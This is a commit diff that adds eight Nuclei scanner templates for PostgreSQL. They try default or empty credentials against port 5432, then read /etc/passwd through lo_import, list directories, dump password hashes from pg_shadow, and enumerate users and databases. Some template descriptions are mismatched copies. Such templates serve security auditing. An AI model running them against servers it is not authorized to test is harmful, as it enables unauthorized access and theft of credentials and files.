JS - pgsql
pussycat0x
parent
005231adaa
commit
827e356e9a
|
|
@ -0,0 +1,49 @@
|
|||
id: pgsql-default-db
|
||||
|
||||
info:
|
||||
name: Postgresql Default Database - Enumeration
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Postgresql has a flaw that allows the attacker to login with empty password.
|
||||
reference:
|
||||
- https://www.tenable.com/plugins/nessus/104031
|
||||
metadata:
|
||||
shodan-query: product:"PostgreSQL"
|
||||
tags: js,network,postgresql
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
connected = client.ConnectWithDB(Host, Port, User, Pass, Db);
|
||||
connected ;
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 5432
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{password}}"
|
||||
Db: "{{database}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- postgres
|
||||
- meow
|
||||
database:
|
||||
- foresight
|
||||
- postgres
|
||||
- template0
|
||||
- template1
|
||||
- test
|
||||
password:
|
||||
- postgres
|
||||
-
|
||||
attack: clusterbomb
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
||||
- "response == true"
|
||||
condition: and
|
||||
|
|
@ -0,0 +1,63 @@
|
|||
id: postgresql-exprement
|
||||
|
||||
info:
|
||||
name: PGSQL -EXP
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Read and list the files within the PostgreSQL database,
|
||||
reference:
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
|
||||
metadata:
|
||||
shodan-query: product:"PostgreSQL"
|
||||
tags: js,network,postgresql
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
const flread = "SELECT lo_import('/etc/passwd');"
|
||||
for (let i=0; i < 1; i++){
|
||||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, flread);
|
||||
const final = to_json(connected)
|
||||
const parsedData = JSON.parse(final);
|
||||
const loImportValue = parsedData.Rows[0].lo_import;
|
||||
const valtw = "SELECT lo_get(" + loImportValue +");"
|
||||
const qry = [valtw, "SELECT * from pg_largeobject;"];
|
||||
for (const x of qry){
|
||||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
|
||||
Export(connected);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 5432
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{password}}"
|
||||
Db: "{{database}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- postgres
|
||||
database:
|
||||
- postgres
|
||||
password:
|
||||
- postgres
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
|
@ -0,0 +1,42 @@
|
|||
id: postgresql-file-read
|
||||
|
||||
info:
|
||||
name: PostgreSQL File Read
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Read and list the files within the PostgreSQL database,
|
||||
reference:
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
|
||||
metadata:
|
||||
shodan-query: product:"PostgreSQL"
|
||||
tags: js,network,postgresql
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
|
||||
Export(connected);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 5432
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{password}}"
|
||||
Db: "{{database}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- postgres
|
||||
database:
|
||||
- postgres
|
||||
password:
|
||||
- postgres
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.Rows[].pg_ls_dir'
|
||||
|
|
@ -0,0 +1,42 @@
|
|||
id: postgresql-list-database
|
||||
|
||||
info:
|
||||
name: PostgreSQL List Database
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
PostgreSQL List Password Hashes
|
||||
reference:
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
|
||||
- https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
|
||||
metadata:
|
||||
shodan-query: product:"PostgreSQL"
|
||||
tags: js,network,postgresql
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database");
|
||||
Export(connected);
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 5432
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{password}}"
|
||||
Db: "{{database}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- postgres
|
||||
database:
|
||||
- postgres
|
||||
password:
|
||||
- postgres
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.Rows[].datname'
|
||||
|
|
@ -0,0 +1,42 @@
|
|||
id: pgsql-exec
|
||||
|
||||
info:
|
||||
name: PostgreSQL List Password Hashes
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
PostgreSQL List Password Hashes
|
||||
reference:
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
|
||||
- https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
|
||||
metadata:
|
||||
shodan-query: product:"PostgreSQL"
|
||||
tags: js,network,postgresql
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
|
||||
Export(connected)
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 5432
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{password}}"
|
||||
Db: "{{database}}"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- postgres
|
||||
database:
|
||||
- postgres
|
||||
password:
|
||||
- postgres
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.Rows[] | "\(.usename) : \(.passwd)"'
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
id: pgsql-list-users
|
||||
|
||||
info:
|
||||
name: PostgreSQL List Users
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Postgresql has a flaw that allows the attacker to login with empty password.
|
||||
reference:
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users
|
||||
metadata:
|
||||
shodan-query: product:"PostgreSQL"
|
||||
tags: js,network,postgresql
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user");
|
||||
Export(connected);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 5432
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{password}}"
|
||||
Db: "{{database}}"
|
||||
# Query: "\du"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- postgres
|
||||
database:
|
||||
- postgres
|
||||
password:
|
||||
- postgres
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.Rows[].usename'
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
id: pgsql-version-detect
|
||||
|
||||
info:
|
||||
name: Postgresql Version - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Postgresql has a flaw that allows the attacker to login with empty password.
|
||||
reference:
|
||||
- https://www.tenable.com/plugins/nessus/104031
|
||||
metadata:
|
||||
shodan-query: product:"PostgreSQL"
|
||||
tags: js,network,postgresql
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select version();");
|
||||
Export(connected);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 5432
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{password}}"
|
||||
Db: "{{database}}"
|
||||
# Query: "\du"
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- postgres
|
||||
database:
|
||||
- postgres
|
||||
password:
|
||||
- postgres
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.Rows[0].version'
|
||||
|
|
@ -0,0 +1,33 @@
|
|||
id: postgresql-empty-password
|
||||
|
||||
info:
|
||||
name: Postgresql Empty Password - Detect
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Postgresql has a flaw that allows the attacker to login with empty password.
|
||||
reference:
|
||||
- https://www.tenable.com/plugins/nessus/104031
|
||||
metadata:
|
||||
shodan-query: product:"PostgreSQL"
|
||||
tags: js,network,postgresql
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
const postgres = require('nuclei/postgres');
|
||||
const client = new postgres.PGClient;
|
||||
const connected = client.Connect(Host, Port, User, Pass);
|
||||
connected;
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: 5432
|
||||
User: "postgres"
|
||||
Pass: "postgres"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "success == true"
|
||||
- "response == true"
|
||||
condition: and
|
||||
Loading…
Reference in New Issue